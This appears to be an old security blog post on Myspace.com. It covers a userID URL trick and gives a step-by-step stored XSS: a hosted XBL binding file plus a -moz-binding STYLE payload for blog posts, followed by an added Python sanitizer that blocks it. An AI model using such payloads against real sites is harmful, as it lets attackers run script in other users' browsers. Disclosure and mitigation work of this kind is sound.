Hacking Session at Myspace.com

Today I got my internet connection back at home, and for me that was enough to celebrate. So I did a small web hacking session on different websites like eBay, Google, Myspace and some more. (Un)fortunately my session was very successful and I’ve found some really nasty stuff on those websites. This time I’d like to talk about the findings I made at myspace.com.

  1. How to write a message to your own account?

    Normally you’re unable to write a private message to your own account. For testing purposes this isn’t very nice, because you need at least two accounts and then always have to switch between them. So have a look at the URL you go to when you answer a private message you got from another person:

    http://messaging.myspace.com/index.cfm?fuseaction=mail.readmessage&userID=12345678&type=inbox&messageID=[theMessageID]&fed=True&MyToken=[yourToken]

    The variable called “userID” is the most interesting one for us now, because we can change it to any user we’d like. So the last thing we have to do is get our own ID. This is very simple: just go to your own profile and copy the URL that is linked when you click on “View My: Blog”. In it you’ll find a variable called “friendID”; that’s your own ID. That’s it, now you can send messages to yourself :)

    (Of course there are many more ways to get your own ID)

  2. Is Myspace.com now XSS protected?

    The answer is: NO! :-D

    I have to say that their protection mechanisms are very good if I compare them with other well-known websites. But as we all know, something is not secure simply because it has better protection than others. So as you can imagine now, I “XSSed” Myspace.com :)

    Here’s my HowTo:

    1. The first step is preparation. You need webspace somewhere where you can upload a script like the following:

      <bindings>
      <binding id="xss">
      <implementation>
      <constructor>alert('XSS')</constructor>
      </implementation>
      </binding>
      </bindings>

      Now save it on your server and name it something like xss.xml

    2. OK, now let’s really start with the attack. Go to your Myspace profile and from there to your personal blog. Now click on “Post New Blog” and first enter an interesting subject. Then go to the “Body” part of your blog entry and enter the following:

      <STYLE>BODY{-moz-binding:url("http://[yourPreparedServer]/xss.xml#xss")}</STYLE>

      (of course you have to replace the brackets [])

      Now you can check whether your XSS was successful by clicking on “Preview & Post”. An alert message saying “XSS” should now pop up :)
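
A server-side mitigation for the blog-body injection in step 2, as an added example (not code from the original post or from Myspace): it rebuilds the submitted HTML from an allow-list and discards `<style>` elements and `style` attributes, so no author-supplied CSS such as `-moz-binding` reaches other users' browsers. The tag list, attribute list, URL schemes and the `sanitize` name are assumptions chosen for illustration.

```python
from html import escape
from html.parser import HTMLParser

# Assumed policy (not Myspace's): tag/attribute allow-lists, no author CSS.
ALLOWED_TAGS = {"p", "br", "b", "i", "em", "strong", "ul", "ol", "li", "a"}
ALLOWED_ATTRS = {"a": {"href"}}
DROP_WITH_CONTENT = {"style", "script"}  # remove the element and its text
SAFE_SCHEMES = ("http://", "https://", "mailto:")

class BlogSanitizer(HTMLParser):
    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.out = []       # sanitized fragments
        self.dropped = []   # what was removed, for logging or alerting
        self._skip = 0      # > 0 while inside a dropped element

    def handle_starttag(self, tag, attrs):
        if tag in DROP_WITH_CONTENT:
            self._skip += 1
        if self._skip or tag not in ALLOWED_TAGS:
            self.dropped.append(f"<{tag}>")
            return
        kept = []
        for name, value in attrs:
            value = value or ""
            ok = name in ALLOWED_ATTRS.get(tag, ())
            if ok and name == "href":
                ok = value.strip().lower().startswith(SAFE_SCHEMES)
            if ok:
                kept.append(f' {name}="{escape(value, quote=True)}"')
            else:
                self.dropped.append(f"{tag}@{name}")
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in DROP_WITH_CONTENT:
            self._skip = max(0, self._skip - 1)
        elif not self._skip and tag in ALLOWED_TAGS and tag != "br":
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        if not self._skip:
            self.out.append(escape(data))  # text is re-encoded, never trusted

def sanitize(body):
    s = BlogSanitizer()
    s.feed(body)
    s.close()
    return "".join(s.out), s.dropped
```

Given the blog body from step 2, `sanitize` returns an empty string and reports `<style>` in the dropped list; an unclosed `<style>` swallows the rest of the input, so the filter fails closed.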

